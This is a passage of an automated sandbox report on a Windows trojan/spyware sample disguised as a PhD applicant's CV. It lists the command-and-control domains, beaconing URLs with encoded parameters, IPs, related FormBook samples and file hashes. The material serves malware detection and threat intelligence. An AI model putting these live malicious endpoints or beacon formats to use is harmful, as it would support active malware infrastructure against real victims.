                http://www.kikaraofficial.xyz/lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.havan-oficial.online/m462/0%Avira URL Cloudsafe
                http://www.wcp95.top/nv0k/0%Avira URL Cloudsafe
                http://www.imgiu9.vip/jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4=0%Avira URL Cloudsafe
                http://www.premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.bocadolobopetra.net/5lh9/0%Avira URL Cloudsafe
                http://www.7fh27o.vip/bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.premium303max.rest/s6a5/0%Avira URL Cloudsafe
                http://www.redex.fun/7tio/0%Avira URL Cloudsafe
                http://www.havan-oficial.online/m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc=0%Avira URL Cloudsafe
                http://www.wcp95.top/nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds=0%Avira URL Cloudsafe
                http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn0%Avira URL Cloudsafe
                http://www.wcp95.top0%Avira URL Cloudsafe
                http://www.6686vi38.app/o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.155n8etsy.autos/b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w=0%Avira URL Cloudsafe
                http://www.6686vi38.app/o25q/0%Avira URL Cloudsafe
                http://www.bocadolobopetra.net/5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU=0%Avira URL Cloudsafe
                http://www.155n8etsy.autos/b38f/0%Avira URL Cloudsafe
                http://www.oriony.live/baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.imgiu9.vip/jwt5/0%Avira URL Cloudsafe
                https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.havan-oficial.online
                		199.59.243.227
                		truetrue
                  		unknown
                  wcp95.top
                  		154.23.184.95
                  		truetrue
                    		unknown
                    bocadolobopetra.net
                    		3.33.130.190
                    		truetrue
                      		unknown
                      rmzl-0.rest
                      		3.33.130.190
                      		truetrue
                        		unknown
                        7fh27o.vip
                        		3.33.130.190
                        		truetrue
                          		unknown
                          6686vi38.app
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.ergeneescortg.xyz
                            		104.21.56.13
                            		truetrue
                              		unknown
                              natroredirect.natrocdn.com
                              		85.159.66.93
                              		truefalse
                                		high
                                www.oriony.live
                                		192.64.118.221
                                		truetrue
                                  		unknown
                                  uppercrust.club
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    imgiu9.vip
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.premium303max.rest
                                      		45.79.252.94
                                      		truetrue
                                        		unknown
                                        4rk.0c7t96olwyjdr.sbs
                                        		43.156.106.109
                                        		truetrue
                                          		unknown
                                          www.redex.fun
                                          		185.68.16.94
                                          		truetrue
                                            		unknown
                                            www.thesquare.world
                                            		13.248.169.48
                                            		truetrue
                                              		unknown
                                              gtml.huksa.huhusddfnsuegcdn.com
                                              		23.167.152.41
                                              		truefalse
                                                		high
                                                www.7fh27o.vip
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.kikaraofficial.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.imgiu9.vip
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.06753.photo
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.wcp95.top
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.6686vi38.app
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown
                                                            www.155n8etsy.autos
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown
                                                              www.uppercrust.club
                                                              		unknown
                                                              		unknownfalse
                                                                		unknown
                                                                www.bocadolobopetra.net
                                                                		unknown
                                                                		unknownfalse
                                                                  		unknown
                                                                  www.rmzl-0.rest
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		unknown

                                                                    Contacted URLs

                                                                    NameMaliciousAntivirus DetectionReputation
                                                                    http://www.rmzl-0.rest/ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.havan-oficial.online/m462/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.thesquare.world/a5kc/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.uppercrust.club/p1mo/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.rmzl-0.rest/ywsl/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.kikaraofficial.xyz/lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.7fh27o.vip/bpf5/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.redex.fun/7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oriony.live/baro/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.wcp95.top/nv0k/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.imgiu9.vip/jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.redex.fun/7tio/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.wcp95.top/nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.7fh27o.vip/bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.bocadolobopetra.net/5lh9/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.premium303max.rest/s6a5/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.havan-oficial.online/m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.6686vi38.app/o25q/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.imgiu9.vip/jwt5/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.bocadolobopetra.net/5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.155n8etsy.autos/b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.6686vi38.app/o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.oriony.live/baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdaprtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.155n8etsy.autos/b38f/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drfalse
                                                                      		high
                                                                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drfalse
                                                                        		high
                                                                        https://duckduckgo.com/ac/?q=aU043Z43.4.drfalse
                                                                          		high
                                                                          http://tempuri.org/ds.xsdMaryam Farokhi-PhD- CV-1403.exefalse
                                                                            		high
                                                                            https://cdn.adm.tools/parking-page/style.cssnetbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoaU043Z43.4.drfalse
                                                                              		high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aU043Z43.4.drfalse
                                                                                		high
                                                                                https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.comnetbtugc.exe, 00000004.00000002.33211442161.00000000065B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33210230485.000000000454C000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.00000000032CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_alldp.iconetbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drfalse
                                                                                          		high
                                                                                          http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBnnetbtugc.exe, 00000004.00000002.33210230485.000000000504A000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003DCA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.aapanel.com/new/download.html?invite_code=aapanelenetbtugc.exe, 00000004.00000002.33210230485.00000000051DC000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003F5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.wcp95.topptzMmYcrKro.exe, 00000005.00000002.33208331721.00000000008CF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://gemini.google.com/app?q=netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/netbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                192.64.118.221
                                                                                                		www.oriony.liveUnited States
                                                                                                		22612NAMECHEAP-NETUStrue
                                                                                                13.248.169.48
                                                                                                		www.thesquare.worldUnited States
                                                                                                		16509AMAZON-02UStrue
                                                                                                45.79.252.94
                                                                                                		www.premium303max.restUnited States
                                                                                                		63949LINODE-APLinodeLLCUStrue
                                                                                                43.156.106.109
                                                                                                		4rk.0c7t96olwyjdr.sbsJapan4249LILLY-ASUStrue
                                                                                                185.68.16.94
                                                                                                		www.redex.funUkraine
                                                                                                		200000UKRAINE-ASUAtrue
                                                                                                199.59.243.227
                                                                                                		www.havan-oficial.onlineUnited States
                                                                                                		395082BODIS-NJUStrue
                                                                                                154.23.184.95
                                                                                                		wcp95.topUnited States
                                                                                                		174COGENT-174UStrue
                                                                                                85.159.66.93
                                                                                                		natroredirect.natrocdn.comTurkey
                                                                                                		34619CIZGITRfalse
                                                                                                3.33.130.190
                                                                                                		bocadolobopetra.netUnited States
                                                                                                		8987AMAZONEXPANSIONGBtrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1553733
                                                                                                Start date and time:2024-11-11 16:55:26 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 16m 28s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                Run name:Suspected Instruction Hammering
                                                                                                Number of analysed new started processes analysed:5
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Sample name:Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@17/9
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 75%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 91%
                                                                                                • Number of executed functions: 102
                                                                                                • Number of non-executed functions: 280
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                • Excluded domains from analysis (whitelisted): ecs.office.com
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: Maryam Farokhi-PhD- CV-1403.exe

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                11:01:22API Interceptor20318873x Sleep call for process: netbtugc.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                192.64.118.221RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.elarac.top/favd/
                                                                                                ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.elarac.top/hcv9/
                                                                                                SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                • www.oporio.xyz/wsmp/
                                                                                                Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                • www.elarac.top/hcv9/?urk=NXuT&0dk=i0zpRIKfBsqaPcaPDER8nUxzZRFDCipl8J5u88RgJ30Dq0aXm679zDMOUT0OK9asUr9KPAhfInTfMeTLGuc3GC/U5s2GEaYqyn9930FNTUtQmFVEKg==
                                                                                                PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                • www.dariuz.info/fr03/
                                                                                                13.248.169.48fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.ulula.org/4w1b/
                                                                                                New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.sonoscan.org/xlhb/
                                                                                                AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.xphone.net/i7vz/
                                                                                                s7wZiIHFbt.exeGet hashmaliciousUnknownBrowse
                                                                                                • shopistar.com/clip.exe
                                                                                                Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                                                • difficultpeople.net/index.php
                                                                                                YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                                                • difficultpeople.net/index.php
                                                                                                Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                                                • difficultpeople.net/index.php
                                                                                                Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.how2.guru/20wk/
                                                                                                SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.sonoscan.org/ew98/
                                                                                                3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.solidarity.rocks/hezo/

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                www.havan-oficial.onlinefHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                • 199.59.243.227
                                                                                                icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                • 199.59.243.227

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                AMAZON-02UShttp://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                • 54.229.166.30
                                                                                                wget.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                • 54.171.230.55
                                                                                                tftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                • 34.254.182.186
                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 13.62.75.143
                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.219.23.111
                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 18.238.49.99
                                                                                                https://dp0gl1.fj84.fdske.com/e/c/01jcddej3zhmq2g9dn4vhatbr0/01jcddej3zhmq2g9dn4vtrz93vGet hashmaliciousUnknownBrowse
                                                                                                • 18.245.86.63
                                                                                                90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                • 185.166.143.50
                                                                                                https://url.uk.m.mimecastprotect.com/s/kDIoCE937cZ18nFwhvH7E_ay?domain=eye.sbc31.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.32.99.103
                                                                                                DDH_LP (1).exeGet hashmaliciousUnknownBrowse
                                                                                                • 18.245.60.39
                                                                                                LILLY-ASUSsora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                • 43.146.107.117
                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 43.103.185.11
                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                • 42.12.22.210
                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                • 40.2.50.68
                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                • 40.244.34.101
                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                • 40.204.15.177
                                                                                                yakuza.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 43.159.81.234
                                                                                                botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 40.148.180.104
                                                                                                botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 40.167.236.149
                                                                                                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 43.80.242.158
                                                                                                NAMECHEAP-NETUShttps://dp0gl1.fj84.fdske.com/e/c/01jcddej3zhmq2g9dn4vhatbr0/01jcddej3zhmq2g9dn4vtrz93vGet hashmaliciousUnknownBrowse
                                                                                                • 68.65.122.95
                                                                                                Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                • 192.64.118.90
                                                                                                Purchase order.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 192.64.118.90
                                                                                                KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                • 199.188.200.195
                                                                                                KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                • 199.188.200.195
                                                                                                Play-Audio_Vmail_Ach Statement Credi....htmlGet hashmaliciousHtmlDropperBrowse
                                                                                                • 199.188.200.234
                                                                                                Play_VM_00_01_22sec-ATT212monika.hayward@bostonbeer.com.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                • 162.0.238.119
                                                                                                xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                                • 63.250.43.10
                                                                                                RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                                • 192.64.118.221
                                                                                                https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 63.250.47.132
                                                                                                LINODE-APLinodeLLCUSRFQ.docxGet hashmaliciousFormBookBrowse
                                                                                                • 45.33.6.223
                                                                                                Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                                • 45.79.252.94
                                                                                                SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                • 45.33.6.223
                                                                                                https://majorbrdide.comGet hashmaliciousUnknownBrowse
                                                                                                • 173.255.204.62
                                                                                                DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                • 45.79.252.94
                                                                                                sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 212.71.245.12
                                                                                                https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                                • 45.33.30.197
                                                                                                update.htaGet hashmaliciousCobalt Strike, SliverBrowse
                                                                                                • 23.239.28.166
                                                                                                SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                • 178.79.184.196
                                                                                                5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 45.33.20.235

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Maryam Farokhi-PhD- CV-1403.exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.354384827676232
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4K1Bs1qE4qXKDE4KhKMaKhPKIE4oKnKoZAE4KzD1E4x84j:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhp
                                                                                                MD5:511475387A5161D4052316C38F7FF282
                                                                                                SHA1:2CE71F7A372D6965DD42B71EEC5E8F81D43343B3
                                                                                                SHA-256:AD084A10414740C5054EDBCF76007E75F9E7456D3C7C5DA8865F0ECD491A6E61
                                                                                                SHA-512:E60E0218C46DF20260D81B7A1FBD69BF019C54E36A8ACDB74ADAB91A90BD8960ECC8E16F3872851119DA05E72787433DD3C54E099F9E6526342E05C38D5364C7
                                                                                                Malicious:true
                                                                                                Reputation:moderate, very likely benign file
